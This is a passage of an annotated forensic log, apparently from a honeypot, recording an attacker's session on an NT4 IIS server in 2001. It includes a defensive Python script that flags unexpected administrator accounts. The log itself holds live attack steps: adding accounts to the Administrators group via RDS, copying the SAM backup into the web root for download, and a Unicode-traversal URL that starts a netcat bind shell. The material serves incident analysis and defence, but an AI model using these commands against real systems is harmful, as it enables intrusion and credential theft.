            {/ADD | /DELETE} [/DOMAIN]
  C:\>
13:55:45 net localgroup administrators
  Alias name     administrators
  Comment        Members can fully administer the computer/domain

  Members
  -------------------------------------------------------------------------------
  Administrator            Domain Admins
  The command completed successfully.
  C:\>
13:56:05 RDS: net localgroup administrators IUSR_KENNY /ADD
13:56:09 RDS: net localgroup administrators IWAM_KENNY /ADD
13:56:24 [Anet localgroup administrators
  The name specified is not recognized as an internal or external command, operable program or batch file.
  C:\>
13:56:34 net localgroup administrators
  Alias name     administrators
  Comment        Members can fully administer the computer/domain

  Members
  -------------------------------------------------------------------------------
  Administrator            Domain Admins            IUSR_KENNY
  IWAM_KENNY
  The command completed successfully.
  C:\>
13:56:38 net session
  System error 5 has occurred.
  Access is denied.
  C:\>
13:56:42 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\

  11/26/00  12:34p              0 AUTOEXEC.BAT
  11/26/00  06:57p            322 boot.ini
  11/26/00  12:34p              0 CONFIG.SYS
  12/26/00  07:36p                exploits
  12/07/00  03:30p                InetPub
  12/07/00  03:12p                Multimedia Files
  12/26/00  07:10p                New Folder
  01/26/01  02:10p     78,643,200 pagefile.sys
  12/21/00  08:59p                Program Files
  02/04/01  06:49a             69 README.NOW.Hax0r
  12/21/00  08:59p                TEMP
  02/04/01  06:55a                WINNT
  12/26/00  07:09p                wiretrip
  02/04/01  06:43a              0 yay.txt
          14 File(s)   78,643,591 bytes
                    1,690,852,864 bytes free

  C:\>

13:56:53 cd program files
  C:\Program Files>
13:56:54 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\Program Files

  12/21/00  08:59p                .
  12/21/00  08:59p                ..
  12/07/00  03:11p                Common Files
  12/21/00  08:59p                D4
  12/07/00  03:23p                ICW-Internet Connection Wizard
  12/07/00  03:37p                Microsoft FrontPage
  12/07/00  03:34p                Mts
  12/07/00  03:23p                Outlook Express
  11/26/00  06:42p                Plus!
  12/16/00  06:54p                Syslogd
  11/26/00  06:56p                Windows NT
          11 File(s)            0 bytes
                    1,690,852,864 bytes free

  C:\Program Files>

13:56:56 cd common files
  C:\Program Files\Common Files>
13:56:57 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\Program Files\Common Files

  12/07/00  03:11p                .
  12/07/00  03:11p                ..
  12/07/00  03:23p                Microsoft Shared
  12/07/00  03:35p                ODBC
  12/07/00  03:23p                Services
  12/07/00  03:23p                System
           6 File(s)            0 bytes
                    1,690,852,864 bytes free

  C:\Program Files\Common Files>

13:57:03 cd obdc
  The system cannot find the path specified.
  C:\Program Files\Common Files>
13:57:04 dir again
13:57:13 cd microsoft shadr
  The filename, directory name, or volume label syntax is incorrect.
  C:\Program Files\Common Files>
13:57:18 cd microsoft shared
  C:\Program Files\Common Files\Microsoft Shared>
13:57:19 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\Program Files\Common Files\Microsoft Shared

  12/07/00  03:23p                .
  12/07/00  03:23p                ..
  12/07/00  03:23p                Stationery
  12/07/00  03:09p                TextConv
           4 File(s)            0 bytes
                    1,690,852,864 bytes free

  C:\Program Files\Common Files\Microsoft Shared>

13:57:22 cd ..
  C:\Program Files\Common Files>
13:57:25 cd odbc
  C:\Program Files\Common Files\ODBC>
13:57:25 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\Program Files\Common Files\ODBC

  12/07/00  03:35p                .
  12/07/00  03:35p                ..
  12/07/00  03:35p                Data Sources
           3 File(s)            0 bytes
                    1,690,852,864 bytes free

  C:\Program Files\Common Files\ODBC>

13:57:13 cd data dou
  The system cannot find the path specified.
  C:\Program Files\Common Files\ODBC>
13:57:33 cd data sources
  C:\Program Files\Common Files\ODBC\Data Sources>
13:57:34 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\Program Files\Common Files\ODBC\Data Sources

  12/07/00  03:35p                .
  12/07/00  03:35p                ..
           2 File(s)            0 bytes
                    1,690,852,864 bytes free

  C:\Program Files\Common Files\ODBC\Data Sources>

13:57:38 cd ..
  C:\Program Files\Common Files>
13:57:50 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\Program Files\Common Files

  12/07/00  03:11p                .
  12/07/00  03:11p                ..
  12/07/00  03:23p                Microsoft Shared
  12/07/00  03:35p                ODBC
  12/07/00  03:23p                Services
  12/07/00  03:23p                System
           6 File(s)            0 bytes
                    1,690,852,864 bytes free

  C:\Program Files\Common Files>

13:57:52 cd system
  C:\Program Files\Common Files\System>
13:57:53 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\Program Files\Common Files\System

  12/07/00  03:23p                .
  12/07/00  03:23p                ..
  12/07/00  03:34p                ado
  02/04/01  06:43a                msadc
  12/07/00  03:34p                ole db
  11/11/97  12:50p        399,120 wab32.dll
           6 File(s)      399,120 bytes
                    1,690,852,864 bytes free

  C:\Program Files\Common Files\System>

13:57:55 cd msads
  The system cannot find the path specified.
  C:\Program Files\Common Files\System>
13:57:56 dir again
13:58:00 cd msas
  The filename, directory name, or volume label syntax is incorrect.
  C:\Program Files\Common Files\System>
13:58:02 cd msadc
  C:\Program Files\Common Files\System\msadc>
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\Program Files\Common Files\System\msadc

  02/04/01  06:43a                .
  02/04/01  06:43a                ..
  09/25/97  07:41a            596 adcjavas.inc
  09/25/97  07:41a            589 adcvbs.inc
  04/30/97  11:00p        208,144 cmd1.exe
  09/25/97  08:28a        172,816 msadce.dll
  09/25/97  08:16a          5,632 msadcer.dll
  09/25/97  08:24a         23,312 msadcf.dll
  09/25/97  08:24a         91,408 msadco.dll
  09/25/97  08:19a          5,120 msadcor.dll
  09/26/97  08:19a         42,256 msadcs.dll
  02/04/01  06:41a         59,392 nc.exe
  02/04/01  06:41a         32,768 pdump.exe
  10/02/97  07:28a         19,388 readme.txt
  02/04/01  06:41a         36,864 samdump.dll
          15 File(s)      698,285 bytes
                    1,690,852,864 bytes free

  C:\Program Files\Common Files\System\msadc>

13:58:06 psu
  The name specified is not recognized as an internal or external command, operable program or batch file.
  C:\Program Files\Common Files\System\msadc>
13:58:08 pdump
  Failed to open lsass: 5. Exiting.
  C:\Program Files\Common Files\System\msadc>
13:58:33 net start
  These Windows NT services are started:
    Alerter
    Computer Browser
    EventLog
    FTP Publishing Service
    IIS Admin Service
    License Logging Service
    Messenger
    MSDTC
    Net Logon
    NT LM Security Support Provider
    Plug and Play
    Protected Storage
    Remote Procedure Call (RPC) Locator
    Remote Procedure Call (RPC) Service
    Server
    Spooler
    TCP/IP NetBIOS Helper
    Workstation
    World Wide Web Publishing Service
  The command completed successfully.
  C:\Program Files\Common Files\System\msadc>
13:58:59 RDS: net user testuser UgotHacked /ADD
13:59:18 RDS: net localgroup Administrators testuser /ADD
13:59:20 netbios-ssn and ICMP ping from the attacker. The attacker attempts to establish a session using the new account.
13:59:54 net localgroup administrators
  Alias name     administrators
  Comment        Members can fully administer the computer/domain

  Members
  -------------------------------------------------------------------------------
  Administrator            Domain Admins            IUSR_KENNY
  IWAM_KENNY
  The command completed successfully.
  C:\Program Files\Common Files\System\msadc>
14:00:15 net users
  User accounts for \\
  -------------------------------------------------------------------------------
  Administrator            Guest                    IUSR_KENNY
  IWAM_KENNY
  The command completed with one or more errors.
  C:\Program Files\Common Files\System\msadc>
14:00:24 net users /?
  The syntax of this command is:
  NET USER [username [password | *] [options]] [/DOMAIN]
           username {password | *} /ADD [options] [/DOMAIN]
           username [/DELETE] [/DOMAIN]
  C:\Program Files\Common Files\System\msadc>
14:00:36 net users hi guy /ADD
  System error 1312 has occurred.
  A specified logon session does not exist. It may already have been terminated.
  C:\Program Files\Common Files\System\msadc>
14:01:11 net user
  User accounts for \\
  -------------------------------------------------------------------------------
  Administrator            Guest                    IUSR_KENNY
  IWAM_KENNY
  The command completed with one or more errors.
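The membership listings above are the clearest host-side evidence of what happened: between 13:55:45 and 13:56:34 the IIS anonymous account (IUSR_KENNY) and the out-of-process web application account (IWAM_KENNY) were added to the local Administrators group, something no legitimate configuration needs. The following is an added example, not from the original analysis, that parses `net localgroup` output as captured in this session and flags members that are not in an expected baseline, with IUSR_/IWAM_ accounts called out specifically. The sample output is constructed from the listings above; real `net` output lays members out in fixed-width columns, which is why each line is split on runs of two or more spaces. Function and constant names are my own.

```python
import re

# Added example (not part of the original analysis).  Sample output is
# constructed from the `net localgroup administrators` listings above.

SAMPLE_BEFORE = """\
Alias name     administrators
Comment        Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
Administrator            Domain Admins
The command completed successfully.
"""

SAMPLE_AFTER = """\
Alias name     administrators
Comment        Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
Administrator            Domain Admins            IUSR_KENNY
IWAM_KENNY
The command completed successfully.
"""

# Members a lab NT4 IIS box would legitimately have in Administrators
# (assumed baseline for this example).
BASELINE = {"Administrator", "Domain Admins"}
# IIS anonymous / out-of-process application accounts must never be admins.
SERVICE_ACCOUNT_PREFIXES = ("IUSR_", "IWAM_")


def parse_net_localgroup(text: str):
    """Return (alias, [members]) from `net localgroup <group>` output.

    Members appear after the dashed separator and before the trailing
    'The command completed' line, up to three per row in fixed-width
    columns; splitting on 2+ spaces keeps names containing a single
    space ('Domain Admins') intact."""
    alias, members, in_members = None, [], False
    for line in text.splitlines():
        if line.startswith("Alias name"):
            alias = line.split(None, 2)[2]
        elif line.startswith("----"):
            in_members = True
        elif line.startswith("The command completed"):
            break
        elif in_members and line.strip():
            members.extend(re.split(r"\s{2,}", line.strip()))
    return alias, members


def unexpected_admins(members, baseline=BASELINE):
    """List (member, reason) for every member outside the baseline."""
    flagged = []
    for m in members:
        if m in baseline:
            continue
        if m.upper().startswith(SERVICE_ACCOUNT_PREFIXES):
            flagged.append((m, "iis service account"))
        else:
            flagged.append((m, "not in baseline"))
    return flagged


def diff_membership(before_text: str, after_text: str):
    """Members present in the later snapshot but not the earlier one."""
    _, before = parse_net_localgroup(before_text)
    _, after = parse_net_localgroup(after_text)
    return [m for m in after if m not in before]


if __name__ == "__main__":
    alias, members = parse_net_localgroup(SAMPLE_AFTER)
    print(alias, members)
    print("flagged:", unexpected_admins(members))
    print("added since earlier snapshot:", diff_membership(SAMPLE_BEFORE, SAMPLE_AFTER))
```

On a real host this comparison belongs in a periodic job: snapshot the group, diff against the previous snapshot, and raise on any addition, since the attacker here added members through RDS in a session that left no interactive logon.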
  C:\Program Files\Common Files\System\msadc>
14:01:15 net user /?
  The syntax of this command is:
  NET USER [username [password | *] [options]] [/DOMAIN]
           username {password | *} /ADD [options] [/DOMAIN]
           username [/DELETE] [/DOMAIN]
  C:\Program Files\Common Files\System\msadc>
14:01:36 net user himan HarHar666 /ADD
  System error 1312 has occurred.
  A specified logon session does not exist. It may already have been terminated.
  C:\Program Files\Common Files\System\msadc>
14:02:55 net name
  Name
  -------------------------------------------------------------------------------
  LAB
  ADMINISTRATOR
  The command completed successfully.
  C:\Program Files\Common Files\System\msadc>
14:03:15 net user
  User accounts for \\
  -------------------------------------------------------------------------------
  Administrator            Guest                    IUSR_KENNY
  IWAM_KENNY
  The command completed with one or more errors.
  C:\Program Files\Common Files\System\msadc>
14:03:21 net user Administrator
  System error 1312 has occurred.
  A specified logon session does not exist. It may already have been terminated.
  C:\Program Files\Common Files\System\msadc>
14:05:24 del c
  Could Not Find C:\Program Files\Common Files\System\msadc\c
  del samdump.dll
  del pdump.exe
14:05:40 cd\winnt
  C:\WINNT>
14:05:44 cd repair
  C:\WINNT\repair>
14:05:46 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\WINNT\repair

  11/26/00  06:43p                .
  11/26/00  06:43p                ..
  10/13/96  07:38p            438 autoexec.nt
  11/26/00  12:34p          2,510 config.nt
  11/26/00  06:43p         15,677 default._
  11/26/00  06:43p         14,946 ntuser.da_
  11/26/00  06:43p          4,593 sam._
  11/26/00  06:43p          6,066 security._
  11/26/00  06:54p         50,405 setup.log
  11/26/00  06:43p        124,776 software._
  11/26/00  06:43p         80,874 system._
          11 File(s)      300,285 bytes
                    1,690,922,496 bytes free

  C:\WINNT\repair>

14:05:51 rdisk -s/
  C:\WINNT\repair>
  rdisk -/s
  C:\WINNT\repair>
14:06:00 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\WINNT\repair

  11/26/00  06:43p                .
  11/26/00  06:43p                ..
  10/13/96  07:38p            438 autoexec.nt
  11/26/00  12:34p          2,510 config.nt
  11/26/00  06:43p         15,677 default._
  11/26/00  06:43p         14,946 ntuser.da_
  11/26/00  06:43p          4,593 sam._
  11/26/00  06:43p          6,066 security._
  11/26/00  06:54p         50,405 setup.log
  11/26/00  06:43p        124,776 software._
  11/26/00  06:43p         80,874 system._
          11 File(s)      300,285 bytes
                    1,690,922,496 bytes free

  C:\WINNT\repair>

14:06:27 rdisk
  C:\WINNT\repair>
  rdisk interacts with the desktop!
  rdisk -s
  dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\WINNT\repair

  11/26/00  06:43p                .
  11/26/00  06:43p                ..
  10/13/96  07:38p            438 autoexec.nt
  11/26/00  12:34p          2,510 config.nt
  11/26/00  06:43p         15,677 default._
  11/26/00  06:43p         14,946 ntuser.da_
  11/26/00  06:43p          4,593 sam._
  11/26/00  06:43p          6,066 security._
  11/26/00  06:54p         50,405 setup.log
  11/26/00  06:43p        124,776 software._
  11/26/00  06:43p         80,874 system._
          11 File(s)      300,285 bytes
                    1,690,922,496 bytes free

  C:\WINNT\repair>
  cat
  The name specified is not recognized as an internal or external command, operable program or batch file.
  C:\WINNT\repair>
  type sam._
  Access is denied.
  C:\WINNT\repair>
14:06:27 RDS: rdisk -/s
14:06:38 RDS: rdisk -s
14:06:42 RDS: rdisk
14:06:44 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\WINNT\repair

  02/04/01  07:05a                .
  02/04/01  07:05a                ..
  02/04/01  07:05a        827,392 $$hive$$.tmp
  10/13/96  07:38p            438 autoexec.nt
  11/26/00  12:34p          2,510 config.nt
  11/26/00  06:43p         15,677 default._
  11/26/00  06:43p         14,946 ntuser.da_
  11/26/00  06:43p          4,593 sam._
  11/26/00  06:43p          6,066 security._
  11/26/00  06:54p         50,405 setup.log
  11/26/00  06:43p        124,776 software._
          11 File(s)    1,046,803 bytes
                    1,690,111,488 bytes free

  C:\WINNT\repair>

14:06:47 dir
   Volume in drive C has no label.
   Volume Serial Number is 8403-6A0E

   Directory of C:\WINNT\repair

  02/04/01  07:05a                .
  02/04/01  07:05a                ..
02/04/01 07:05a 827,392 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 11/26/00 06:43p 14,946 ntuser.da_ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 11/26/00 06:43p 124,776 software._ 11 File(s) 1,046,803 bytes 1,690,095,104 bytes free C:\WINNT\repair> 14:06:51 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 02/04/01 07:05a . 02/04/01 07:05a .. 02/04/01 07:05a 827,392 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 11/26/00 06:43p 14,946 ntuser.da_ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 11/26/00 06:43p 124,776 software._ 11 File(s) 1,046,803 bytes 1,690,060,288 bytes free C:\WINNT\repair> 14:07:00 RDS rdisk -s/ 14:07:10 RDS rdisk -s/ 14:07:32 RDS rdisk /s- 14:07:34 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 02/04/01 07:06a . 02/04/01 07:06a .. 02/04/01 07:05a 3,469,312 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 02/04/01 07:06a 14,946 ntuser.da_ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 02/04/01 07:05a 177,732 system._ 11 File(s) 3,741,679 bytes 1,687,127,552 bytes free C:\WINNT\repair> 14:07:38 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 02/04/01 07:06a . 02/04/01 07:06a .. 
02/04/01 07:05a 3,469,312 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 02/04/01 07:05a 177,732 system._ 10 File(s) 3,726,733 bytes 1,687,082,496 bytes free C:\WINNT\repair> 14:07:50 RDS rdisk /s- 14:07:52 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 02/04/01 07:06a . 02/04/01 07:06a .. 02/04/01 07:05a 3,469,312 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 02/04/01 07:06a 14,946 ntuser.da_ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 02/04/01 07:05a 177,732 system._ 11 File(s) 3,741,679 bytes 1,686,932,480 bytes free C:\WINNT\repair> 14:07:56 dir Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair Volume in drive C has no label. 02/04/01 07:06a . 02/04/01 07:06a .. 02/04/01 07:05a 3,469,312 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 11/26/00 06:43p 15,677 default._ 11/26/00 06:43p 4,593 sam._ 11/26/00 06:43p 6,066 security._ 11/26/00 06:54p 50,405 setup.log 02/04/01 07:05a 177,732 system._ 10 File(s) 3,726,733 bytes 1,686,871,552 bytes free C:\WINNT\repair> 14:08:32 RDS rdisk /s- 14:08:35 RDS type c:\winnt\repair\sam._ >>c:\har.txt 14:08:42 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 02/04/01 07:07a . 02/04/01 07:07a .. 02/04/01 07:07a 827,392 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 02/04/01 07:07a 16,275 default._ 02/04/01 07:07a 14,946 ntuser.da_ 02/04/01 07:07a 5,327 sam._ 02/04/01 07:07a 10,111 security._ 11/26/00 06:54p 50,405 setup.log 02/04/01 07:07a 686,053 software._ 11 File(s) 1,613,457 bytes 1,689,496,576 bytes free C:\WINNT\repair> 14:08:44 cd\ dir Volume in drive C has no label. 
Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:05a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 15 File(s) 78,648,918 bytes 1,689,455,616 bytes free C:\> 14:08:51 type har.txt MSCF $$hive$$.tmp ...... >>> har.txt is the 5,327-byte copy of sam._ written via RDS; the MSCF signature marks it as a Microsoft Cabinet archive, i.e. the compressed backup of the SAM hive that rdisk /s- just refreshed. Afterwards, with the binary data typed to it, the shell seems to be unusable 14:10:42 UNICODE /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe new shell on port 6969 14:11:06 HTTP-Request shows the referer: Referer:.http://linux.unix.or.kr/~uxbbs/cgi-bin/pds.cgi?pds=freedata 14:11:10 HTTP-Request from 213.116.251.162 shows the referer: Referer:.http://www.google.com/search?q=esb.php3&hl=en&lr=&safe=off 14:11:19 UNICODE new shell on port 6968 14:11:24 attacker connects to new shell 14:11:26 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\system\msadc 02/04/01 07:04a . 02/04/01 07:04a .. 09/25/97 07:41a 596 adcjavas.inc 09/25/97 07:41a 589 adcvbs.inc 04/30/97 11:00p 208,144 cmd1.exe 09/25/97 08:28a 172,816 msadce.dll 09/25/97 08:16a 5,632 msadcer.dll 09/25/97 08:24a 23,312 msadcf.dll 09/25/97 08:24a 91,408 msadco.dll 09/25/97 08:19a 5,120 msadcor.dll 09/26/97 08:19a 42,256 msadcs.dll 02/04/01 06:41a 59,392 nc.exe 10/02/97 07:28a 19,388 readme.txt 13 File(s) 628,653 bytes 1,690,259,968 bytes free C:\Program Files\Common Files\system\msadc> 14:11:29 net session System error 5 has occurred. Access is denied. C:\Program Files\Common Files\system\msadc> 14:11:33 cd\ dir Volume in drive C has no label. 
Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:08a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 15 File(s) 78,648,918 bytes 1,690,259,968 bytes free C:\> 14:11:40 del yay.txt C:\yay.txt The process cannot access the file because it is being used by another process. C:\> >>> pdump.exe is still running and accesses yay.txt 14:11:47 cd wiretrip dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\wiretrip 12/26/00 07:09p . 12/26/00 07:09p .. 12/26/00 07:04p 15,501 msadc1.pl 12/26/00 07:04p 17,865 msadc2.pl 12/26/00 07:04p 4,425 RFParalyze.c 12/26/00 07:04p 2,269 RFPickaxe.pl 12/26/00 07:05p 7,393 RFPoison.c 12/26/00 07:04p 12,450 RFPoison.zip 12/26/00 07:04p 1,792 RFProwl.c 12/26/00 07:06p 170,372 whisker.tar.gz 12/26/00 07:06p 173,427 whisker.zip 12/26/00 07:05p 25,229 whiskerids.html 12 File(s) 430,723 bytes 1,690,259,968 bytes free C:\wiretrip> 14:11:59 cd .. dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:08a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 15 File(s) 78,648,918 bytes 1,690,259,968 bytes free C:\> 14:12:09 cd new folder dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\New Folder 12/26/00 07:10p . 
12/26/00 07:10p .. 2 File(s) 0 bytes 1,690,259,968 bytes free C:\New Folder> cd.. cd inetpub dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub 12/07/00 03:30p . 12/07/00 03:30p .. 11/26/00 12:40p ftproot 11/26/00 12:40p gophroot 12/07/00 03:31p iissamples 11/26/00 12:40p scripts 12/15/00 08:56p wwwroot 7 File(s) 0 bytes 1,690,259,968 bytes free C:\InetPub> 14:12:19 cd wwwroot dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 12/15/00 08:56p . 12/15/00 08:56p .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 23 File(s) 42,748 bytes 1,690,259,968 bytes free C:\InetPub\wwwroot> 14:12:25 copy c:\har.txt 1 file(s) copied. C:\InetPub\wwwroot> 14:12:32 HTTP request for the copy of har.txt just placed in wwwroot: the SAM backup is retrieved over plain HTTP from the web root 14:14:27 del har.txt dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:11a . 02/04/01 07:11a .. 
12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 02/04/01 07:07a 5,327 har.txt 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 48,075 bytes 1,690,254,336 bytes free C:\InetPub\wwwroot> >>> har.txt still there dir again 14:14:36 del har.txt C:\InetPub\wwwroot\har.txt Access is denied. C:\InetPub\wwwroot> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:11a . 02/04/01 07:11a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 02/04/01 07:07a 5,327 har.txt 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 48,075 bytes 1,690,254,336 bytes free C:\InetPub\wwwroot> 14:14:53 del har.txt C:\InetPub\wwwroot\har.txt Access is denied. C:\InetPub\wwwroot> 14:15:15 RDS del c:\inetpub\wwwroot\har.txt 14:15:26 dir Volume in drive C has no label. 
Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:11a . 02/04/01 07:11a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 02/04/01 07:07a 5,327 har.txt 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 48,075 bytes 1,690,254,336 bytes free C:\InetPub\wwwroot> >>> har.txt still there 14:15:35 RDS del c:\inetpub\wwwroot\har.txt 14:15:38 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:11a . 02/04/01 07:11a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 02/04/01 07:07a 5,327 har.txt 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 